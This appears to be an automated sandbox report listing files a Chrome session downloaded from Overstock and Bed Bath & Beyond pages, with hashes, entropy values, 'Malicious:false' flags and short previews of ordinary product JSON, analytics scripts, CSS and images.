                                                                                                                                                                                    Entropy (8bit):4.731046553999269
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:BBcBI6huuNnyWcMkgsQw6AJhDUsqOEi8XUPIu7v:BWnX0MkpwpXXy
                                                                                                                                                                                    MD5:3B3D2896650BC5151A496D479B2144F5
                                                                                                                                                                                    SHA1:7CB4CCCA8AA58BB199C87F32232EBC61F37EA1B5
                                                                                                                                                                                    SHA-256:DF0EE452B9598BA9B874E836AAC6C3A8E5A75802F4244126CD917539FF672745
                                                                                                                                                                                    SHA-512:921F9F6EF4E23753522E3714D3934C89060AEC1B90C2996EF287E91EF6D8228BE4FE5B1D29BF90CCEB5FBBA3FDD0000A64831CBC5BF463DA94965F38ABAD6984
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/search.js?view=json&q=id:9259088707743+OR+id:9277491970207+OR+id:9318327386271+OR+id:9287656079519+OR+id:9318559219871+OR+id:9277416177823+OR+id:9277337141407+OR+id:9282912452767+OR+id:9285080645791+OR+id:9283293249695+OR+id:9284320166047+OR+id:9290303537311+OR+id:9281063878815+OR+id:9285012914335+OR+id:9277376463007+OR+id:9281014268063+OR+id:9280803373215+OR+id:9283739123871+OR+id:9277394878623+OR+id:9289837281439+OR+id:9282912452767+OR+id:9289721872543+OR+id:9285241503903+OR+id:9285080645791+OR+id:9277294837919+OR+id:9283993469087+OR+id:9277277307039+OR+id:9283950674079+OR+id:9288894316703+OR+id:9284267114655+OR+id:9285738922143+OR+id:9277294837919+OR+id:9284222058655+OR+id:9284847337631+OR+id:9290303537311+OR+id:9287656079519+OR+id:9277314728095+OR+id:9283854008479+OR+id:9277302669471+OR+id:9277421879455+OR+id:9277376463007+OR+id:9284398448799+OR+id:9403178254495+OR+id:9288066924703+OR+id:9284757815455+OR+id:9285204607135+OR+id:9285043912863+OR+id:9283353936031+OR+id:9322225008799+OR+id:9280912949407+OR+id:9283775496351+OR+id:9285738922143+OR+id:9291396939935+OR+id:9321406627999+OR+id:9277393436831+OR+id:9287552008351+OR+id:9289147646111+OR+id:9283950674079+OR+id:9277427613855+OR+id:9284105797791+OR+id:9284770857119+OR+id:9284151836831+OR+id:9284678189215+OR+id:9281038287007+OR+id:9285212995743+OR+id:9277438820511+OR+id:9284107436191+OR+id:9283393192095+OR+id:9281466040479+OR+id:9283932422303+OR+id:9284773806239+OR+id:9277288677535+OR+id:9284393566367+OR+id:9289003794591+OR+id:9222036848799+OR+id:9288925151391+OR+id:9280859472031+OR+id:9289721872543+OR+id:9290222338207+OR+id:9287209779359+OR+id:9285126127775&resource_type=product
                                                                                                                                                                                    Preview:..{. "results_count": 72,. "products": [ {. "id": 9403178254495,. "variant_id": 46038413705375,. "sku": "26317589-000-009",. "url": "eleanor-double-x-back-wood-swivel-bar-stool-by-inspire-q-classic-20457171?variant=46038413705375",. "variant_title": "Bar Height \/ Antique Black". },. . {. "id": 9322225008799,. "variant_id": 45617169301663,. "sku": "41638061-000-017",. "url": "cadiz-bathroom-vanity-with-composite-stone-top-without-mirror-37831689?variant=45617169301663",. "variant_title": "24in. \/ Black". },. . {. "id": 9321406627999,. "variant_id": 45615285010591,. "sku": "41523766-000-002",. "url": "63-computer-desk-with-monitor-stand-ergonomic-home-office-desks-with-drawers-file-cabinet-37701856?variant=45615285010591",. "variant_title": "Grey". },. . {. "id": 9318559219871,. "variant_id": 45603819520159,.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4099
                                                                                                                                                                                    Entropy (8bit):4.689032470968796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:4Zc5WT9BvpXKZhUyXuXsk8hLb3Dhm2ykOof:4Zc5WNXK3XuXW5T
                                                                                                                                                                                    MD5:A4756A643D066EB154CB755E259EF155
                                                                                                                                                                                    SHA1:80965B4362B43BC28BAC4436A24E1330170A077B
                                                                                                                                                                                    SHA-256:65C8359CA3EDF304556D797A955249CE92B75224834F77F8E170C71D163ABB76
                                                                                                                                                                                    SHA-512:CDBEBB4DED2C449760736DA45CEB59B4B1D32EBE9ACB46ED8F87594BDBD35D87E2E3A755B3E8A6741BC58105C8D17476A666D0138F7FEA71636D68DF6FC7193A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- <
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1339), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1339
                                                                                                                                                                                    Entropy (8bit):5.229001559788375
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2QLmRWeyVLx7gE+oxFrHXNlDLDOLQOTjy88oqEFsGdKcR0sqRWZGKjRF2VFkZXy0:6ELxEEzxFrHzMSWqssGdR0sqw0Aj2vkJ
                                                                                                                                                                                    MD5:956F63A2A49369D5F5244CF8AD04D0BE
                                                                                                                                                                                    SHA1:1BE07A341EB069FF011FF4364069F30780186798
                                                                                                                                                                                    SHA-256:70E2780960DA0799B00EE4AD9FC7388B87E24D8617548EBBDC301818BE8E877F
                                                                                                                                                                                    SHA-512:3239E1C08CCA30333BDD8D6B2EE1D2077B5805E68B844F29F166586E19C558F266C5589C741AFB72B26F31A334C2C8EEDD1B029E0B4ECC4038F2EF5EBCF38A2C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-checkout-script.min.js?api_key=f835946b-0d19-4768-88b1-9c8df850c4bc&sdk_url=sdk.iad-03.braze.com&shop=26f4aa-09.myshopify.com&shop=26f4aa-09.myshopify.com
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function t(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}const l="reconciledCheckouts";var s=null;const c=JSON.parse(localStorage.getItem("__ui"));if(c!=null&&typeof c=="object"&&c.length>2){if(c[2]!=null&&typeof c[2]=="object"&&typeof c[2][0]=="object"){s=c[2][0]["checkoutSessionIdentifier"]}}if(s==null){return}t().getDeviceId(function(e){var t=e;if(t==null){console.warn(`Cannot reconcile checkout ${s} because Braze device ID cannot be obtained`)}else{const c=JSON.parse(localStorage.getItem(l)||"{}");const n=c[s]||null;if(n==t){return}else{c[s]=t;localStorage.setItem(l,JSON.stringify(c))}const o=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-checkout-script")));const i=new URLSearchParams(o.search);const r=Object.fromEntries(i.entries());fetch("https://"+r["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1657
                                                                                                                                                                                    Entropy (8bit):6.390764107974072
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYrLbExn7OpWLeaV52+hYJL7Gv6LmnwykhSxHe:NBIl/XflVxmLbYCp4CptSxHe
                                                                                                                                                                                    MD5:02A966113729BB6ED052BF080E3ADF47
                                                                                                                                                                                    SHA1:2DE53C70241D8F94AE29F962F4D09D74F1E3F58A
                                                                                                                                                                                    SHA-256:92120430A4DBDA3FD62A319E3D780E0134837A849786525CD8AEAD5E3D11BEC1
                                                                                                                                                                                    SHA-512:4EF0791570F5EBED661284509B06D2B55A5AF4967ADDED7ED086A0D7593006F8BDD64709068DB8394360F872B95AEA1907FC2A8AC5B459D629F3E97ABC2F9DE3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................,........@#..+@.[..3m.*U}....#.p.Fn$.p.R.Y)...\.2...y.(*z:?..'6+.^.ps.;$5$5,....D..............6.........................!1..2Aaq....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2362
                                                                                                                                                                                    Entropy (8bit):6.999324573263796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxUSL1FxKkXJhEDUH4GDY1nAe+sXE0/3bE:NBIl/XrxlLXYMjCW4gJe+Kn/LE
                                                                                                                                                                                    MD5:09CA399CE6904A58AB765ED8A08BF44D
                                                                                                                                                                                    SHA1:1EEF5C523389B1BFC7DA7C3DF9C51FECD4E10DEE
                                                                                                                                                                                    SHA-256:2D6C9BB6FAE52DD6605D469D98BDE8ADAF385D0CDEA4F4EBDEB36EDB27613B78
                                                                                                                                                                                    SHA-512:2E4583E70F9192460003B3C16B4515FAD5D676FFD7BA4DB425C3A50E6F3D697003E4A6B657B5AD8BDFBA8A91FECA054FBB0A76A6FF33BBFD300C8BA689BB87B5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................`.n..x.._`....@...N&z.....z)..W.2..k......s`.......#..F............3..e.o....z....x..yt....mZ....!.........r..>.7.u%.B.5.zB..,..Dp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):143
                                                                                                                                                                                    Entropy (8bit):4.659452476607608
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnB32hcOfMNx2JTJb364TJiWzQVQsLVn:YWtIkW/fAnB3AcO0D2JTt5TQW6LVn
                                                                                                                                                                                    MD5:7EBE82C14F2864A86CEB7309B2B79E16
                                                                                                                                                                                    SHA1:0BD09D7AD870F22150018B6D69640445ACC9DB88
                                                                                                                                                                                    SHA-256:89B89DAEF13ED6CB513B75CFE3F0E3025C0E85193E3B087879A0EBEA162A80B8
                                                                                                                                                                                    SHA-512:1DD2F724E6188DB0D73D65EF3A21F1129A588CDAEEFDD98D68F1AEFA47B13B2CE912BE37DF7CBFDF7B7407EF4EE2CEEB031DA939AE82B4ACF09CA525AD0938F1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"35648849","rollup":{"average_rating":3.75,"rating_count":8,"review_count":8,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61494
                                                                                                                                                                                    Entropy (8bit):5.50917747969663
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIe:uYW2Pj5yO7t2ACRg8398vD
                                                                                                                                                                                    MD5:678CDF27A140D6C9EC96FF5F97F5568B
                                                                                                                                                                                    SHA1:D71B1CDEA4B27AB427A9BABCF4D950FF77D18EE8
                                                                                                                                                                                    SHA-256:F1E7D192EC9DF668689534D5B4ECAEFBD9213217242078E48ACD0F5BC574465A
                                                                                                                                                                                    SHA-512:CEA191D11B47A96CD5CECCA0F7F2EF4B79B5B650F64CA7952095260E99E7F4F971C8480EFA59457B914C3BE65C3123917B2A262645CD09514077BB0654C208D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/web-pixel-401408159@cd5baf4e5501957d38fcad8b67181732/sandbox/worker.modern.js
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 267x267, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2462
                                                                                                                                                                                    Entropy (8bit):7.3663816233330435
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:88j78jMinZVO/IcsIYlF+XgmtFpA6eWzGUV3khzbK2xL/BlQ6giBiX:8MPihSVEWz73khXpFiFX
                                                                                                                                                                                    MD5:C1AECDDE6CBFFE704A3A05CD261344E6
                                                                                                                                                                                    SHA1:C14C2B928A4AA4D83AF6070AAD5B842EB1ECA3A0
                                                                                                                                                                                    SHA-256:F68EEE740DECC050DC4E9BAC4DBA67DBAF6528A28E341F8C7BF15180F4BADFFE
                                                                                                                                                                                    SHA-512:DB09E67DE20ADC43ECEA2435BC79DDC238737991680399157820FEC5A4F6845C6C66C0CDFA417F6A7747BF2659184589E168A1CB1F76451E70D0E18066FA71B3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C............."..........0.........................................................................................................]..GT.`...S..[..c...r0.{.....8}.6.\.....d.c......(}.C...... ...=.6.......c.ce...h......>..>....Az...|7p.,.......5.....~}.|sS..p#~c..X....G=...*.X.o..o.<{x;..s.........^....k...YP...q]G!.....*.DA^{....A.t|..5.....[...8..*...a...(..DH.....9mmD..:....>5..I......D. ..I..x.%...y.%".UaX..XUaU.V.XU"."d>....."|...;.Q..F..n0...n..l.$.b....e.....W/.[......yc..j...........H.....xm..>_Q.|).u..a...................B9.B9.B9...9........ ..........................................>..........................!0R....13QSqr. "24Aa.#$@Cbs..Bp...........?...zT.T.iCd .Tu.o..w.&.#...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (31667), with CRLF, LF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1387255
                                                                                                                                                                                    Entropy (8bit):5.668540616661905
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:Evb14dtym5W/CiM77tXlqsU2/etZpQi0SDNXxW1gNJc/E20PsrETDBuc1/jkJRB6:Evb17/C77tXlqsU2/etZpQ4LNJc/zAB
                                                                                                                                                                                    MD5:FFAE478B314957CD16049EF703B877C7
                                                                                                                                                                                    SHA1:6451A955FB9A45781D92684F2694D7E3C31994A1
                                                                                                                                                                                    SHA-256:7192467FCB684D5D29B3C160E24BC266B206E16503A757A62164570569E527FF
                                                                                                                                                                                    SHA-512:25579AF401E881EFF1BF38A340D3A3B855E5F96E1198625655C26460828678329BDEF72061C82C01AA37533BCC83446F6E95A1A46EBAF306D4018170796DAB91
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.bedbathandbeyond.com/
                                                                                                                                                                                    Preview:....... <!DOCTYPE html>. <html lang="en">. <head>. <meta http-equiv="X-UA-Compatible" content="IE=edge" />. <meta name="viewport" content="width=device-width, initial-scale=1">. SEO_META_HOMEPAGE (default) Start -->.<title>Bed Bath & Beyond | The Best Deals Online: Furniture, Bedding, Rugs, Kitchen Essentials & More</title>.<meta name="description" content="Let BedBathandBeyond.com help you discover designer brands &amp; home goods at the lowest prices online. With free shipping on orders over $49.99*. See for yourself why shoppers love our selection &amp; award-winning customer service.">.<meta property="og:image" content="https://ak1.ostkcdn.com/img/mxc/07182024_BB&B-Logo-Stacked.png">.<link rel="canonical" href="https://www.bedbathandbeyond.com" />.<link rel="alternate" href="https://www.bedbathandbeyond.com" hreflang="en-us" />.<link rel="alternate" href="https://www.bedbathandbeyond.com" hreflang="x-default" />.<link rel="alternate" href="https:/
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1914
                                                                                                                                                                                    Entropy (8bit):6.542680945592637
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:rGP/j51sCIl/X2YlXWI2PUSxU9dOBVVFdrLp6owf1ks0C4o6gSsg8ho/KQqXgJb:rGP/jTvIl/XflAU+Dd7bC4z8hop
                                                                                                                                                                                    MD5:AB9CE5A55E7FA0E1971768648925008C
                                                                                                                                                                                    SHA1:D14C69B96EA2EB776044E944222FA325D3211CF2
                                                                                                                                                                                    SHA-256:7F9F5DAD22AD0BFB3D634B92B45722AD5BA104E976CD64DBD7A18037B4B175BC
                                                                                                                                                                                    SHA-512:75E5DB185B2A65ABFB53DD98CA560B2DAC8FE83B3B94AC13595027F91F3334D7CEF0412FFB3CF763BEC0BBBDFFCFA49C926EFC8B1DF7311F0CEF284F79E95DB8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_174e8f95-9b23-4b73-aad5-e355e2e93ffb.jpg?v=1729325303&width=80
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe.......P...P....pixi............ipma...................iref........cdsc..........mdat........d...B2..D$............pp....4..=.\.w.o..3..bA......2..L.....I#`.<.2......!..>.....x@..E..3..S.y^,..@.rp...27k.v3...a..q....Yp.O....@Mj.."....b..=.8..,.....l.)R.R...|vj#.0&..`v....Y\.,P...+@n.. |.PJ....1i.}..U..s...g=.....0Z...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (30343)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):30344
                                                                                                                                                                                    Entropy (8bit):4.71081887626325
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:bu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:klr+Klk3Yi+fwYUf2l8yQ/e9vf
                                                                                                                                                                                    MD5:36082410DF2EF7F83932219089DC1443
                                                                                                                                                                                    SHA1:7961402D7D01E19387FE609A38454B0BC8C6CCA4
                                                                                                                                                                                    SHA-256:5B9573E1023DA775390E9284EC0EB1C606DF9B468A28980055B4A6AA804F4350
                                                                                                                                                                                    SHA-512:806FF5B14991E42523541D89A18EB295C4BC3DD7C7E9895068EF083A898DBE928D3852638CF106D0A646617E773CA2084B439659B41B3125B7E4FCA1D2D81FB1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://use.fontawesome.com/releases/v4.7.0/css/font-awesome-css.min.css
                                                                                                                                                                                    Preview:.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius:.1em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left{margin-right:.3em}.fa.fa-pull-right{margin-left:.3em}.pull-right{float:right}.pull-left{float:left}.fa.pull-left{margin-right:.3em}.fa.pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2092)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2193
                                                                                                                                                                                    Entropy (8bit):5.097379721719103
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:1UaMR5dPIVMHeTRYLw8SUBFmzaPwdxTxN6S:1UaMRjVORYk0jmzaPwdxtp
                                                                                                                                                                                    MD5:215396237626D4E450D7785E6445729B
                                                                                                                                                                                    SHA1:0AF8579E261BC304636E785B2DA68E96FD20E318
                                                                                                                                                                                    SHA-256:170D40ADAF1C166FAE55981AAF685F3463D93E8D03CCF6D314083F67E4D959DE
                                                                                                                                                                                    SHA-512:731F6D551B490356C99ADE91CBF9E393F95E8EC615353947D71DFD21CE6370DA6A045E0B5EB9EDD03230CF094097C8B8EC9EF680B2211C2919338E8E3C2F0798
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:customElements.get("carousel-slider")||customElements.define("carousel-slider",class extends HTMLElement{constructor(){super()}connectedCallback(){this.carousel=this.querySelector(".grid-carousel"),this.initialize()}initialize(){this.carousel.style.display="block",this.flickity=new Flickity(this.carousel,{cellAlign:"left",groupCells:!0,contain:!0,resize:!0,draggable:!0,prevNextButtons:!1,fade:!1,cellSelector:".grid-item",initialIndex:0,pageDots:!1,wrapAround:!1,accessibility:!1,watchCSS:!0,dragThreshold:10}),this.flickity.on("change",index=>{const event=new CustomEvent("slider:slide-change",{detail:{id:this.getAttribute("id"),index}});document.dispatchEvent(event)})}}),customElements.get("carousel-navigation")||customElements.define("carousel-navigation",class extends HTMLElement{constructor(){super()}connectedCallback(){this.init()}init(retry=1,maxRetry=3){if(retry===maxRetry)return;const id=this.getAttribute("for");if(this.carouselComponent=document.querySelector(`#${id}`),!this.caro
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):73
                                                                                                                                                                                    Entropy (8bit):4.656191038630684
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:bR6WQRagDGLOIOSEWrqV:bkrRsCcE
                                                                                                                                                                                    MD5:C9D5D489A7792876CEF045A0477F3B32
                                                                                                                                                                                    SHA1:6891F6B08B0D7D4EF212450F32D97222E05260D8
                                                                                                                                                                                    SHA-256:760BAA3A18E50032F8447C212D774102B69CBE6E35F368DDC2F2A2C2428493FB
                                                                                                                                                                                    SHA-512:37CC9C850F410AB8309406F27E1F4231C4B952DEB828093C9F40C9E5D2459E725AEFC6084B5F45DE23DDD56E448141308AED37D57E1389582CA11671C8B14E1E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/StockProblemsLineItemList.CxdIQKjw.css
                                                                                                                                                                                    Preview:.IDG1X{text-transform:var(--x-global-typography-letter-case, uppercase)}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Rn:R
                                                                                                                                                                                    MD5:7BC0EE636B3B83484FC3B9348863BD22
                                                                                                                                                                                    SHA1:EBBFFB7D7EA5362A22BFA1BAB0BFDEB1617CD610
                                                                                                                                                                                    SHA-256:A2C2339691FC48FBD14FB307292DFF3E21222712D9240810742D7DF0C6D74DFB
                                                                                                                                                                                    SHA-512:4D094B64124366530E7E327B1AD5D06C0FD1CEB96387D6A143E9F561C2F9FF7CA9D68E7C23B8B14AAB5309C202A8DCED9A38D950662A50984D2841577293CD64
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://tags.tiqcdn.com/utag/tiqapp/utag.v.js?a=overstock/main/202409301659&cb=1730294624612
                                                                                                                                                                                    Preview://
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
